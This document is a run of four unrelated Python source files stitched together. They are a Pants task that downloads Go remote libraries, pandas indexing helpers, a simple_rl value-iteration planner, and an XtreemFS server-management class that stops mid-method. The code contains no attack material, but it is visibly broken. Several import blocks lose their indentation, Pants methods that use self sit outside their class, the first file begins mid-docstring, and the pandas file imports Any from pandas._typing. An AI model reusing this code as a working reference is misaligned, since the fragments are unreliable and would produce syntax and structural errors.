    undeclared dependencies as possible. However, because the dependencies of a remote library
    can only be determined _after_ it has been downloaded, a transitive dependency of an undeclared
    remote library will never be detected.

    Because go_remote_libraries do not declare dependencies (rather, they are inferred), injects
    all successfully resolved transitive dependencies into the build graph.
    """
    if not go_remote_libs:
      return {}
    all_known_addresses = all_known_addresses or set()
    all_known_addresses.update(lib.address for lib in go_remote_libs)
    resolved_remote_libs = set()
    undeclared_deps = defaultdict(set)
    go_remote_lib_src = self.context.products.get_data('go_remote_lib_src')
    with self.invalidated(go_remote_libs) as invalidation_check:
      for vt in invalidation_check.all_vts:
        go_remote_lib = vt.target
        gopath = vt.results_dir
        fetcher = self._get_fetcher(go_remote_lib.import_path)
        if not vt.valid:
          root = fetcher.root(go_remote_lib.import_path)
          fetch_dir = os.path.join(self.workdir, 'fetches')
          root_dir = os.path.join(fetch_dir, root)
          # Only fetch each remote root once.
          if not os.path.exists(root_dir):
            # Fetch into a temp dir first, then move into place, so a failed
            # fetch never leaves a partial root_dir behind.
            with temporary_dir() as tmp_fetch_root:
              fetcher.fetch(go_remote_lib.import_path, dest=tmp_fetch_root, rev=go_remote_lib.rev)
              safe_mkdir(root_dir)
              for path in os.listdir(tmp_fetch_root):
                shutil.move(os.path.join(tmp_fetch_root, path), os.path.join(root_dir, path))
          # TODO(John Sirois): Circle back and get rid of this symlink tree.
          # GoWorkspaceTask will further symlink a single package from the tree below into a
          # target's workspace when it could just be linking from the fetch_dir. The only thing
          # standing in the way is a determination of what we want to artifact cache. If we don't
          # want to cache fetched zips, linking straight from the fetch_dir works simply. Otherwise
          # thought needs to be applied to using the artifact cache directly or synthesizing a
          # canonical owner target for the fetched files that 'child' targets (subpackages) can
          # depend on and share the fetch from.
          dest_dir = os.path.join(gopath, 'src', root)
          # We may have been `invalidate`d and not `clean-all`ed so we need a new empty symlink
          # chroot to avoid collision; thus `clean=True`.
          safe_mkdir(dest_dir, clean=True)
          for path in os.listdir(root_dir):
            os.symlink(os.path.join(root_dir, path), os.path.join(dest_dir, path))
        # Map the fetched remote sources.
        pkg = go_remote_lib.import_path
        go_remote_lib_src[go_remote_lib] = os.path.join(gopath, 'src', pkg)
        for remote_import_path in self._get_remote_import_paths(pkg, gopath=gopath):
          fetcher = self._get_fetcher(remote_import_path)
          remote_root = fetcher.root(remote_import_path)
          spec_path = os.path.join(go_remote_lib.target_base, remote_root)
          package_path = GoRemoteLibrary.remote_package_path(remote_root, remote_import_path)
          target_name = package_path or os.path.basename(remote_root)
          address = Address(spec_path, target_name)
          if address not in all_known_addresses:
            try:
              # If we've already resolved a package from this remote root, its ok to define an
              # implicit synthetic remote target for all other packages in the same remote root.
              implicit_ok = any(spec_path == a.spec_path for a in all_known_addresses)
              remote_lib = self._resolve(go_remote_lib, address, package_path, implicit_ok)
              resolved_remote_libs.add(remote_lib)
              all_known_addresses.add(address)
            except self.UndeclaredRemoteLibError as e:
              undeclared_deps[go_remote_lib].add((remote_import_path, e.address))
          self.context.build_graph.inject_dependency(go_remote_lib.address, address)
    # Recurse after the invalidated block, so the libraries we downloaded are now "valid"
    # and thus we don't try to download a library twice.
    trans_undeclared_deps = self._transitive_download_remote_libs(resolved_remote_libs,
                                                                  all_known_addresses)
    undeclared_deps.update(trans_undeclared_deps)
    return undeclared_deps
  class UndeclaredRemoteLibError(Exception):
    """Raised when a remote package has no declared owning go_remote_library."""
    def __init__(self, address):
      self.address = address  # the expected address of the missing declaration
def _resolve(self, dependent_remote_lib, address, pkg, implicit_ok):
  """Resolves the GoRemoteLibrary at `address` defining the given `pkg`.

  If `implicit_ok` is True, then a GoRemoteLibrary to own `pkg` is always synthesized; otherwise
  the address must already exist in the build graph (a BUILD file must exist on disk that owns
  the given `pkg` and declares a `rev` for it).

  :param dependent_remote_lib: The remote library that depends on the remote `pkg`.
  :type: :class:`pants.contrib.go.targets.go_remote_library.GoRemoteLibrary`
  :param address: The address of the remote library that should own `pkg`.
  :type: :class:`pants.base.Address`
  :param string pkg: The remote package path whose owning target needs to be resolved.
  :param bool implicit_ok: `False` if the given `address` must be defined in a BUILD file on disk;
                           otherwise a remote library to own `pkg` will always be created and
                           returned.
  :returns: The resulting resolved remote library after injecting it in the build graph.
  :rtype: :class:`pants.contrib.go.targets.go_remote_library.GoRemoteLibrary`
  :raises: :class:`GoFetch.UndeclaredRemoteLibError`: If no BUILD file exists for the remote root
           `pkg` lives in.
  """
  # Fixed parameter name `implict_ok` -> `implicit_ok` to match the docstring; the caller
  # passes it positionally, so this is backward-compatible.
  if implicit_ok:
    # Synthesize a target owning `pkg`, rooted at the same target base as its dependee.
    self.context.add_new_target(address=address,
                                target_base=dependent_remote_lib.target_base,
                                target_type=GoRemoteLibrary,
                                pkg=pkg)
  else:
    try:
      self.context.build_graph.inject_address_closure(address)
    except AddressLookupError:
      raise self.UndeclaredRemoteLibError(address)
  return self.context.build_graph.get_target(address)
@memoized_property
def go_stdlib(self):
  """The frozenset of Go standard-library import paths, per `go list std` (computed once)."""
  out = self.go_dist.create_go_cmd('list', args=['std']).check_output()
  return frozenset(out.strip().split())
@staticmethod
def _is_relative(import_path):
  """Return True for relative Go import paths (those beginning with a '.')."""
  return import_path[:1] == '.'
def _get_remote_import_paths(self, pkg, gopath=None):
  """Returns the remote import paths declared by the given Go `pkg`.

  Runs `go list -json <pkg>` and collects `Imports` plus `TestImports`, filtering out
  standard-library packages and relative imports.
  """
  out = self.go_dist.create_go_cmd('list', args=['-json', pkg], gopath=gopath).check_output()
  try:
    data = json.loads(out)
    imports = data.get('Imports', [])
    imports.extend(data.get('TestImports', []))
    return [imp for imp in imports
            if (imp not in self.go_stdlib and
                # We assume relative imports are local to the package and skip attempts to
                # recursively resolve them.
                not self._is_relative(imp))]
  except ValueError as e:
    # `go list` produced malformed JSON: save the raw output for post-mortem debugging.
    # NOTE(review): `gopath` may be None here (the default), which would make os.path.join
    # raise — confirm all callers pass an explicit gopath.
    save_file = os.path.join(gopath, '.errors', pkg, 'list.json')
    with safe_open(save_file, 'w') as fp:
      fp.write(out)
    self.context.log.error('Problem determining imports for {}, saved json response to {}'
                           .format(pkg, save_file))
    raise TaskError(e)
|
|
"""
Low-dependency indexing utilities.
"""
from __future__ import annotations
from typing import TYPE_CHECKING
import warnings
import numpy as np
from pandas._typing import (
Any,
AnyArrayLike,
ArrayLike,
)
from pandas.core.dtypes.common import (
is_array_like,
is_bool_dtype,
is_extension_array_dtype,
is_integer,
is_integer_dtype,
is_list_like,
)
from pandas.core.dtypes.generic import (
ABCIndex,
ABCSeries,
)
if TYPE_CHECKING:
from pandas.core.frame import DataFrame
from pandas.core.indexes.base import Index
# -----------------------------------------------------------
# Indexer Identification
def is_valid_positional_slice(slc: slice) -> bool:
    """
    Check if a slice object can be interpreted as a positional indexer.

    Parameters
    ----------
    slc : slice

    Returns
    -------
    bool

    Notes
    -----
    A valid positional slice may also be interpreted as a label-based slice
    depending on the index being sliced.
    """
    # Positional slices allow only integers or None for each of the bounds.
    return all(
        bound is None or is_integer(bound)
        for bound in (slc.start, slc.stop, slc.step)
    )
def is_list_like_indexer(key) -> bool:
    """
    Check if we have a list-like indexer that is *not* a NamedTuple.

    Parameters
    ----------
    key : object

    Returns
    -------
    bool
    """
    if not is_list_like(key):
        return False
    # A NamedTuple subclasses tuple but is treated as a scalar key, not an indexer.
    if isinstance(key, tuple) and type(key) is not tuple:
        return False
    return True
def is_scalar_indexer(indexer, ndim: int) -> bool:
    """
    Return True if we are all scalar indexers.

    Parameters
    ----------
    indexer : object
    ndim : int
        Number of dimensions in the object being indexed.

    Returns
    -------
    bool
    """
    if ndim == 1 and is_integer(indexer):
        # GH37748: a lone integer indexes a 1-dim object (Series) as a scalar
        return True
    if not (isinstance(indexer, tuple) and len(indexer) == ndim):
        return False

    def _element_is_scalar_like(x) -> bool:
        # An integer, or a length-1 one-dimensional ndarray, acts as a scalar.
        if is_integer(x):
            return True
        return isinstance(x, np.ndarray) and x.ndim == 1 and len(x) == 1

    return all(_element_is_scalar_like(x) for x in indexer)
def is_empty_indexer(indexer, arr_value: np.ndarray) -> bool:
    """
    Check if we have an empty indexer.

    Parameters
    ----------
    indexer : object
    arr_value : np.ndarray

    Returns
    -------
    bool
    """
    if is_list_like(indexer) and len(indexer) == 0:
        return True
    if arr_value.ndim != 1:
        return False
    # For a 1-dim target, any empty ndarray component makes the indexer empty.
    parts = indexer if isinstance(indexer, tuple) else (indexer,)
    return any(isinstance(part, np.ndarray) and len(part) == 0 for part in parts)
# -----------------------------------------------------------
# Indexer Validation
def check_setitem_lengths(indexer, value, values) -> bool:
    """
    Validate that value and indexer are the same length.

    An special-case is allowed for when the indexer is a boolean array
    and the number of true values equals the length of ``value``. In
    this case, no exception is raised.

    Parameters
    ----------
    indexer : sequence
        Key for the setitem.
    value : array-like
        Value for the setitem.
    values : array-like
        Values being set into.

    Returns
    -------
    bool
        Whether this is an empty listlike setting which is a no-op.

    Raises
    ------
    ValueError
        When the indexer is an ndarray or list and the lengths don't match.
    """
    if isinstance(indexer, (np.ndarray, list)):
        # Other listlikes are ignored here: tuples are not necessarily 1-D
        # indexers and extension boolean arrays are handled elsewhere.
        if not is_list_like(value):
            return False
        if len(indexer) != len(value) and values.ndim == 1:
            # A boolean mask whose True-count matches len(value) is allowed.
            mask = np.array(indexer) if isinstance(indexer, list) else indexer
            is_matching_mask = (
                isinstance(mask, np.ndarray)
                and mask.dtype == np.bool_
                and len(mask[mask]) == len(value)
            )
            if not is_matching_mask:
                raise ValueError(
                    "cannot set using a list-like indexer "
                    "with a different length than the value"
                )
        return len(indexer) == 0

    if isinstance(indexer, slice):
        if not is_list_like(value):
            return False
        if len(value) != length_of_indexer(indexer, values) and values.ndim == 1:
            # In case of two dimensional value is used row-wise and broadcasted
            raise ValueError(
                "cannot set using a slice indexer with a "
                "different length than the value"
            )
        return len(value) == 0

    return False
def validate_indices(indices: np.ndarray, n: int) -> None:
    """
    Perform bounds-checking for an indexer.

    -1 is allowed for indicating missing values.

    Parameters
    ----------
    indices : ndarray
    n : int
        Length of the array being indexed.

    Raises
    ------
    ValueError

    Examples
    --------
    >>> validate_indices(np.array([1, 2]), 3)  # OK

    >>> validate_indices(np.array([1, -2]), 3)
    Traceback (most recent call last):
        ...
    ValueError: negative dimensions are not allowed

    >>> validate_indices(np.array([1, 2, 3]), 3)
    Traceback (most recent call last):
        ...
    IndexError: indices are out-of-bounds

    >>> validate_indices(np.array([-1, -1]), 0)  # OK

    >>> validate_indices(np.array([0, 1]), 0)
    Traceback (most recent call last):
        ...
    IndexError: indices are out-of-bounds
    """
    # An empty indexer is trivially in bounds.
    if not len(indices):
        return
    min_idx = indices.min()
    if min_idx < -1:
        raise ValueError(
            f"'indices' contains values less than allowed ({min_idx} < -1)"
        )
    if indices.max() >= n:
        raise IndexError("indices are out-of-bounds")
# -----------------------------------------------------------
# Indexer Conversion
def maybe_convert_indices(indices, n: int, verify: bool = True):
    """
    Attempt to convert indices into valid, positive indices.

    If we have negative indices, translate to positive here.
    If we have indices that are out-of-bounds, raise an IndexError.

    Parameters
    ----------
    indices : array-like
        Array of indices that we are to convert.
    n : int
        Number of elements in the array that we are indexing.
    verify : bool, default True
        Check that all entries are between 0 and n - 1, inclusive.

    Returns
    -------
    array-like
        An array-like of positive indices that correspond to the ones
        that were passed in initially to this function.

    Raises
    ------
    IndexError
        One of the converted indices either exceeded the number of,
        elements (specified by `n`), or was still negative.
    """
    if isinstance(indices, list):
        indices = np.array(indices)
        if len(indices) == 0:
            # np.array([]) defaults to float dtype, which cannot be used to
            # index, so short-circuit with an empty intp array.
            return np.empty(0, dtype=np.intp)

    negative = indices < 0
    if negative.any():
        # Translate negative indices to their positive equivalents without
        # mutating the caller's array.
        indices = indices.copy()
        indices[negative] += n

    if verify:
        out_of_bounds = (indices >= n) | (indices < 0)
        if out_of_bounds.any():
            raise IndexError("indices are out-of-bounds")
    return indices
# -----------------------------------------------------------
# Unsorted
def is_exact_shape_match(target: ArrayLike, value: ArrayLike) -> bool:
    """
    Is setting this value into this target overwriting the entire column?

    Parameters
    ----------
    target : np.ndarray or ExtensionArray
    value : np.ndarray or ExtensionArray

    Returns
    -------
    bool
    """
    # Zero-dimensional (scalar-like) arrays can never be an exact match.
    if len(value.shape) == 0 or len(target.shape) == 0:
        return False
    return value.shape[0] == target.shape[0] and value.size == target.size
def length_of_indexer(indexer, target=None) -> int:
    """
    Return the expected length of target[indexer]

    Returns
    -------
    int
    """
    if target is not None and isinstance(indexer, slice):
        n = len(target)
        start, stop, step = indexer.start, indexer.stop, indexer.step
        # Normalize the bounds the way positional slicing does.
        if start is None:
            start = 0
        elif start < 0:
            start += n
        if stop is None or stop > n:
            stop = n
        elif stop < 0:
            stop += n
        if step is None:
            step = 1
        elif step < 0:
            # Flip to the equivalent forward slice.
            start, stop = stop + 1, start + 1
            step = -step
        return (stop - start + step - 1) // step
    if isinstance(indexer, (ABCSeries, ABCIndex, np.ndarray, list)):
        arr = np.array(indexer) if isinstance(indexer, list) else indexer
        if arr.dtype == bool:
            # GH#25774: a boolean mask selects exactly its True entries
            return arr.sum()
        return len(arr)
    if isinstance(indexer, range):
        return (indexer.stop - indexer.start) // indexer.step
    if not is_list_like_indexer(indexer):
        # A scalar indexer selects a single element.
        return 1
    raise AssertionError("cannot find the length of the indexer")
def deprecate_ndim_indexing(result, stacklevel: int = 3):
    """
    Helper function to raise the deprecation warning for multi-dimensional
    indexing on 1D Series/Index.

    GH#27125 indexer like idx[:, None] expands dim, but we cannot do that
    and keep an index, so we currently return ndarray, which is deprecated
    (Deprecation GH#30588).
    """
    if np.ndim(result) <= 1:
        return
    warnings.warn(
        "Support for multi-dimensional indexing (e.g. `obj[:, None]`) "
        "is deprecated and will be removed in a future "
        "version. Convert to a numpy array before indexing instead.",
        FutureWarning,
        stacklevel=stacklevel,
    )
def unpack_1tuple(tup):
    """
    If we have a length-1 tuple/list that contains a slice, unpack to just
    the slice.

    Notes
    -----
    The list case is deprecated.
    """
    if len(tup) != 1 or not isinstance(tup[0], slice):
        return tup
    # if we don't have a MultiIndex, we may still be able to handle
    # a 1-tuple. see test_1tuple_without_multiindex
    if isinstance(tup, list):
        # GH#31299
        warnings.warn(
            "Indexing with a single-item list containing a "
            "slice is deprecated and will raise in a future "
            "version. Pass a tuple instead.",
            FutureWarning,
            stacklevel=3,
        )
    return tup[0]
def check_key_length(columns: Index, key, value: DataFrame):
    """
    Checks if a key used as indexer has the same length as the columns it is
    associated with.

    Parameters
    ----------
    columns : Index The columns of the DataFrame to index.
    key : A list-like of keys to index with.
    value : DataFrame The value to set for the keys.

    Raises
    ------
    ValueError: If the length of key is not equal to the number of columns in value
                or if the number of columns referenced by key is not equal to number
                of columns.
    """
    if columns.is_unique:
        mismatch = len(value.columns) != len(key)
    else:
        # Missing keys in columns are represented as -1
        mismatch = len(columns.get_indexer_non_unique(key)[0]) != len(value.columns)
    if mismatch:
        raise ValueError("Columns must be same length as key")
# -----------------------------------------------------------
# Public indexer validation
def check_array_indexer(array: AnyArrayLike, indexer: Any) -> Any:
    """
    Check if `indexer` is a valid array indexer for `array`.

    For a boolean mask, `array` and `indexer` are checked to have the same
    length. The dtype is validated, and if it is an integer or boolean
    ExtensionArray, it is checked if there are missing values present, and
    it is converted to the appropriate numpy array. Other dtypes will raise
    an error.

    Non-array indexers (integer, slice, Ellipsis, tuples, ..) are passed
    through as is.

    .. versionadded:: 1.0.0

    Parameters
    ----------
    array : array-like
        The array that is being indexed (only used for the length).
    indexer : array-like or list-like
        The array-like that's used to index. List-like input that is not yet
        a numpy array or an ExtensionArray is converted to one. Other input
        types are passed through as is.

    Returns
    -------
    numpy.ndarray
        The validated indexer as a numpy array that can be used to index.

    Raises
    ------
    IndexError
        When the lengths don't match.
    ValueError
        When `indexer` cannot be converted to a numpy ndarray to index
        (e.g. presence of missing values).

    See Also
    --------
    api.types.is_bool_dtype : Check if `key` is of boolean dtype.

    Examples
    --------
    When checking a boolean mask, a boolean ndarray is returned when the
    arguments are all valid.

    >>> mask = pd.array([True, False])
    >>> arr = pd.array([1, 2])
    >>> pd.api.indexers.check_array_indexer(arr, mask)
    array([ True, False])

    An IndexError is raised when the lengths don't match.

    >>> mask = pd.array([True, False, True])
    >>> pd.api.indexers.check_array_indexer(arr, mask)
    Traceback (most recent call last):
    ...
    IndexError: Boolean index has wrong length: 3 instead of 2.

    NA values in a boolean array are treated as False.

    >>> mask = pd.array([True, pd.NA])
    >>> pd.api.indexers.check_array_indexer(arr, mask)
    array([ True, False])

    A numpy boolean mask will get passed through (if the length is correct):

    >>> mask = np.array([True, False])
    >>> pd.api.indexers.check_array_indexer(arr, mask)
    array([ True, False])

    Similarly for integer indexers, an integer ndarray is returned when it is
    a valid indexer, otherwise an error is (for integer indexers, a matching
    length is not required):

    >>> indexer = pd.array([0, 2], dtype="Int64")
    >>> arr = pd.array([1, 2, 3])
    >>> pd.api.indexers.check_array_indexer(arr, indexer)
    array([0, 2])

    >>> indexer = pd.array([0, pd.NA], dtype="Int64")
    >>> pd.api.indexers.check_array_indexer(arr, indexer)
    Traceback (most recent call last):
    ...
    ValueError: Cannot index with an integer indexer containing NA values

    For non-integer/boolean dtypes, an appropriate error is raised:

    >>> indexer = np.array([0., 2.], dtype="float64")
    >>> pd.api.indexers.check_array_indexer(arr, indexer)
    Traceback (most recent call last):
    ...
    IndexError: arrays used as indices must be of integer or boolean type
    """
    from pandas.core.construction import array as pd_array

    # whatever is not an array-like is returned as-is (possible valid array
    # indexers that are not array-like: integer, slice, Ellipsis, None)
    # In this context, tuples are not considered as array-like, as they have
    # a specific meaning in indexing (multi-dimensional indexing)
    if is_list_like(indexer):
        if isinstance(indexer, tuple):
            return indexer
    else:
        # BUG FIX: this early return must only apply to NON-list-like input.
        # Previously both branches returned `indexer`, so every list-like
        # indexer bypassed the dtype validation and conversion below.
        return indexer

    # convert list-likes to array
    if not is_array_like(indexer):
        indexer = pd_array(indexer)
        if len(indexer) == 0:
            # empty list is converted to float array by pd.array
            indexer = np.array([], dtype=np.intp)

    dtype = indexer.dtype
    if is_bool_dtype(dtype):
        if is_extension_array_dtype(dtype):
            # NA values in a boolean mask are treated as False.
            indexer = indexer.to_numpy(dtype=bool, na_value=False)
        else:
            indexer = np.asarray(indexer, dtype=bool)

        # GH26658
        if len(indexer) != len(array):
            raise IndexError(
                f"Boolean index has wrong length: "
                f"{len(indexer)} instead of {len(array)}"
            )
    elif is_integer_dtype(dtype):
        try:
            indexer = np.asarray(indexer, dtype=np.intp)
        except ValueError as err:
            raise ValueError(
                "Cannot index with an integer indexer containing NA values"
            ) from err
    else:
        raise IndexError("arrays used as indices must be of integer or boolean type")

    return indexer
|
|
# Python imports.
from __future__ import print_function
from collections import defaultdict
import random
import copy
# Check python version for queue module.
import sys
if sys.version_info[0] < 3:
import Queue as queue
else:
import queue
# Other imports.
from simple_rl.planning.PlannerClass import Planner
class ValueIteration(Planner):
    '''Tabular value iteration planner.

    Estimates T(s' | s, a) empirically by sampling the MDP's transition
    function, then iterates Bellman backups until the largest value change
    drops below @delta or @max_iterations is reached.
    '''

    def __init__(self, mdp, name="value_iter", delta=0.0001, max_iterations=500, sample_rate=3):
        '''
        Args:
            mdp (MDP)
            name (str): Name for this planner instance.
            delta (float): After an iteration of VI, if no change more than @\delta has occurred, terminates.
            max_iterations (int): Hard limit for number of iterations.
            sample_rate (int): Determines how many samples from @mdp to take to estimate T(s' | s, a).
        '''
        Planner.__init__(self, mdp, name=name)

        self.delta = delta
        self.max_iterations = max_iterations
        self.sample_rate = sample_rate
        self.value_func = defaultdict(float)
        self.max_q_act_histories = defaultdict(str)
        self.reachability_done = False
        self.has_computed_matrix = False
        self.bellman_backups = 0
        # Bug fix: @has_planned was previously only assigned in run_vi(), so
        # calling plan() or get_num_backups_in_recent_run() before running VI
        # raised AttributeError. Initialize it here.
        self.has_planned = False
        # trans_dict[s][a][s'] --> estimated probability of s' given (s, a).
        self.trans_dict = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))

    def _compute_matrix_from_trans_func(self):
        '''
        Summary:
            Samples the transition function @self.sample_rate times per
            (state, action) pair to fill the empirical transition matrix
            @self.trans_dict. Runs at most once.
        '''
        if self.has_computed_matrix:
            # Matrix already built; just make sure reachability is computed.
            self._compute_reachable_state_space()
            return

        for s in self.get_states():
            for a in self.actions:
                for sample in range(self.sample_rate):
                    s_prime = self.transition_func(s, a)
                    self.trans_dict[s][a][s_prime] += 1.0 / self.sample_rate

        self.has_computed_matrix = True

    def get_gamma(self):
        # Discount factor of the underlying MDP.
        return self.mdp.get_gamma()

    def get_num_states(self):
        if not self.reachability_done:
            self._compute_reachable_state_space()
        return len(self.states)

    def get_states(self):
        # _compute_reachable_state_space is a no-op if already done.
        if not self.reachability_done:
            self._compute_reachable_state_space()
        return list(self.states)

    def get_value(self, s):
        '''
        Args:
            s (State)

        Returns:
            (float): The max Q value at @s under the current value function.
        '''
        return self._compute_max_qval_action_pair(s)[0]

    def get_q_value(self, s, a):
        '''
        Args:
            s (State)
            a (str): action

        Returns:
            (float): The Q estimate given the current value function @self.value_func.
        '''
        if s.is_terminal():
            # Terminal states contribute no future value (check hoisted out of
            # the loop; the loop body was skipped per-element before).
            return 0

        # Expected immediate reward plus discounted expected future value.
        expected_future_val = 0
        for s_prime in self.trans_dict[s][a].keys():
            expected_future_val += self.trans_dict[s][a][s_prime] * self.reward_func(s, a, s_prime) + \
                self.gamma * self.trans_dict[s][a][s_prime] * self.value_func[s_prime]
        return expected_future_val

    def _compute_reachable_state_space(self):
        '''
        Summary:
            Starting with @self.start_state, determines all reachable states
            and stores them in self.states.
        '''
        if self.reachability_done:
            return

        # Breadth-first expansion from the initial state, sampling each
        # (state, action) pair @self.sample_rate times.
        state_queue = queue.Queue()
        state_queue.put(self.init_state)
        self.states.add(self.init_state)

        while not state_queue.empty():
            s = state_queue.get()
            for a in self.actions:
                for samples in range(self.sample_rate):
                    next_state = self.transition_func(s, a)
                    if next_state not in self.states:
                        self.states.add(next_state)
                        state_queue.put(next_state)

        self.reachability_done = True

    def run_vi(self):
        '''
        Returns:
            (tuple):
                1. (int): num iterations taken.
                2. (float): value of the initial state.

        Summary:
            Runs ValueIteration and fills in the self.value_func.
        '''
        iterations = 0
        max_diff = float("inf")
        self._compute_matrix_from_trans_func()
        state_space = self.get_states()
        self.bellman_backups = 0

        # Iterate Bellman backups until convergence or the iteration cap.
        while max_diff > self.delta and iterations < self.max_iterations:
            max_diff = 0
            for s in state_space:
                self.bellman_backups += 1
                if s.is_terminal():
                    continue

                max_q = float("-inf")
                for a in self.actions:
                    q_s_a = self.get_q_value(s, a)
                    max_q = q_s_a if q_s_a > max_q else max_q

                # Check terminating condition.
                max_diff = max(abs(self.value_func[s] - max_q), max_diff)

                # Update value.
                self.value_func[s] = max_q
            iterations += 1

        value_of_init_state = self._compute_max_qval_action_pair(self.init_state)[0]
        self.has_planned = True

        return iterations, value_of_init_state

    def run_vi_histories(self):
        '''
        Returns:
            (tuple):
                1. (int): num iterations taken.
                2. (float): value of the initial state.
                3. (list of dict of state and float):
                    histories of the previous iterations.

        Summary:
            Runs ValueIteration and fills in the self.value_func and returns histories
        '''
        iterations = 0
        max_diff = float("inf")
        self._compute_matrix_from_trans_func()
        state_space = self.get_states()
        self.bellman_backups = 0
        histories = []

        while max_diff > self.delta and iterations < self.max_iterations:
            max_diff = 0
            for s in state_space:
                self.bellman_backups += 1
                if s.is_terminal():
                    continue

                max_q = float("-inf")
                for a in self.actions:
                    q_s_a = self.get_q_value(s, a)
                    if(q_s_a > max_q):
                        max_q = q_s_a
                        # Remember the greedy action per state for this sweep.
                        self.max_q_act_histories[s] = a

                # Check terminating condition.
                max_diff = max(abs(self.value_func[s] - max_q), max_diff)

                # Update value.
                self.value_func[s] = max_q

            # Snapshot the greedy-action table after each full sweep.
            histories.append(copy.deepcopy(self.max_q_act_histories))
            iterations += 1

        value_of_init_state = self._compute_max_qval_action_pair(self.init_state)[0]
        self.has_planned = True

        return iterations, value_of_init_state, histories

    def get_num_backups_in_recent_run(self):
        if self.has_planned:
            return self.bellman_backups
        else:
            print("Warning: asking for num Bellman backups, but VI has not been run.")
            return 0

    def print_value_func(self):
        for key in self.value_func.keys():
            print(key, ":", self.value_func[key])

    def plan(self, state=None, horizon=50):
        '''
        Args:
            state (State)
            horizon (int)

        Returns:
            (list): List of actions
        '''
        state = self.mdp.get_init_state() if state is None else state

        if self.has_planned is False:
            print("Warning: VI has not been run. Plan will be random.")

        # Greedily follow the learned value function for up to @horizon steps.
        action_seq = []
        state_seq = [state]
        steps = 0

        while (not state.is_terminal()) and steps < horizon:
            next_action = self._get_max_q_action(state)
            action_seq.append(next_action)
            state = self.transition_func(state, next_action)
            state_seq.append(state)
            steps += 1

        return action_seq, state_seq

    def _get_max_q_action(self, state):
        '''
        Args:
            state (State)

        Returns:
            (str): The action with the max q value in the given @state.
        '''
        return self._compute_max_qval_action_pair(state)[1]

    def get_max_q_actions(self, state):
        '''
        Args:
            state (State)

        Returns:
            (list): List of actions with the max q value in the given @state.
        '''
        max_q_val = self.get_value(state)
        best_action_list = []

        # Collect every action tied for the max predicted Q value.
        for action in self.actions:
            q_s_a = self.get_q_value(state, action)
            if q_s_a == max_q_val:
                best_action_list.append(action)

        return best_action_list

    def policy(self, state):
        '''
        Args:
            state (State)

        Returns:
            (str): Action

        Summary:
            For use in a FixedPolicyAgent.
        '''
        return self._get_max_q_action(state)

    def _compute_max_qval_action_pair(self, state):
        '''
        Args:
            state (State)

        Returns:
            (tuple) --> (float, str): where the float is the Qval, str is the action.
        '''
        # Start from the first action in case all Q values are equal.
        max_q_val = float("-inf")
        best_action = self.actions[0]

        for action in self.actions:
            q_s_a = self.get_q_value(state, action)
            if q_s_a > max_q_val:
                max_q_val = q_s_a
                best_action = action

        return max_q_val, best_action
|
|
# Copyright (c) 2009-2011 by Minor Gordon, Bjoern Kolbeck, Zuse Institute Berlin
# Licensed under the BSD License, see LICENSE file for details.
from datetime import datetime
from time import sleep
import sys, os, subprocess, signal
class Server:
    """Manages one XtreemFS Java server process: config generation, start, stop.

    Subclasses (DIR, MRC, OSD) override configure() with service-specific settings.
    NOTE: this file is Python 2 (print statements, xrange, old raise syntax).
    """

    def __init__(self,
                 start_stop_retries,
                 config_file_path,
                 run_dir_path,
                 xtreemfs_dir,
                 data_dir,
                 rpc_port,
                 uuid,
                 storage_threads):
        # Number of kill attempts per signal used by stop().
        self._start_stop_retries = start_stop_retries
        self._config_file_path = config_file_path
        # Directory holding the <uuid>.pid file.
        self._run_dir_path = run_dir_path
        self._xtreemfs_dir = xtreemfs_dir
        self._data_dir = data_dir
        self._config = dict()
        # Initialize with default values
        self._config['listen.port'] = rpc_port
        # HTTP status-page port is derived from the RPC port.
        self._config['http_port'] = rpc_port - 2000
        self._config['debug.level'] = 6
        self._config['uuid'] = uuid
        self._config['ssl.enabled'] = 'false'
        self._config['storage_threads'] = storage_threads

    def configure(self):
        pass
        # Nothing to do here.  Subclasses override with service-specific settings.

    def set_debug_level(self, debug_level):
        self._config['debug.level'] = debug_level

    def enable_ssl(self,
                   use_gridssl,
                   pkcs12_file_path,
                   pkcs12_passphrase,
                   trusted_certs_jks_file_path,
                   trusted_certs_jks_passphrase):
        # NOTE(review): "grid SSL" presumably means SSL handshake with plain
        # data transfer — confirm against XtreemFS docs.
        self._config['ssl.enabled'] = 'true'
        if use_gridssl:
            self._config['ssl.grid_ssl'] = 'true'
        else:
            self._config['ssl.grid_ssl'] = 'false'
        self._config['ssl.service_creds'] = pkcs12_file_path
        self._config['ssl.service_creds.pw'] = pkcs12_passphrase
        self._config['ssl.service_creds.container'] = 'PKCS12'
        self._config['ssl.trusted_certs'] = trusted_certs_jks_file_path
        self._config['ssl.trusted_certs.pw'] = trusted_certs_jks_passphrase
        self._config['ssl.trusted_certs.container'] = 'JKS'

    # set configuration parameters required for SNMP support
    def enable_snmp(self,
                    snmp_port,
                    snmp_address,
                    snmp_aclfile):
        self._config['snmp.enabled'] = 'true'
        self._config['snmp.port'] = snmp_port
        self._config['snmp.address'] = snmp_address
        self._config['snmp.aclfile'] = snmp_aclfile

    # Imports the configuration from the config file.
    def read_config_file(self):
        self._config = dict()
        for line in open(self._config_file_path).readlines():
            # Split on the first '=' only; values may contain '='.
            line_parts = line.split( "=", 1 )
            if len( line_parts ) == 2:
                self._config[line_parts[0].strip()] = line_parts[1].strip()

    # Writes the current configuration to a config file
    def write_config_file(self):
        text = "# autogenerated by test_server.py at "+str(datetime.now())+"\n"
        for k in sorted(self._config.keys()):
            text += str(k) + "=" + str(self._config[k]) + "\n"
        f = open(self._config_file_path,'w')
        f.write(text)
        f.close()

    def get_config_file_path(self):
        return self._config_file_path

    def _get_config_property(self, key):
        return self._config[key]

    def _get_pid_file_path(self):
        # One pid file per server, keyed by its UUID.
        return os.path.join(self._run_dir_path, self.get_uuid() + ".pid")

    def get_http_port(self):
        return int(self._config["http_port"])

    def get_rpc_port(self):
        return int(self._config["listen.port"])

    def get_uuid(self):
        return self._config["uuid"]

    def getServiceUrl(self):
        # Scheme depends on the SSL mode: pbrpc / pbrpcg (grid SSL) / pbrpcs.
        url = "pbrpc://"
        if (self._config['ssl.enabled'] == 'true'):
            if (self._config['ssl.grid_ssl'] == 'true'):
                url = "pbrpcg://"
            else:
                url = "pbrpcs://"
        url += "localhost:" + str(self._config["listen.port"]) + "/"
        return url

    def is_running(self):
        # A server counts as running if its pid file exists and the child
        # process has not exited (checked via non-blocking waitpid).
        pid_file_path = self._get_pid_file_path()
        if os.path.exists(pid_file_path):
            pid = open(pid_file_path).read().strip()
            try:
                pid = int(pid)
            except ValueError:
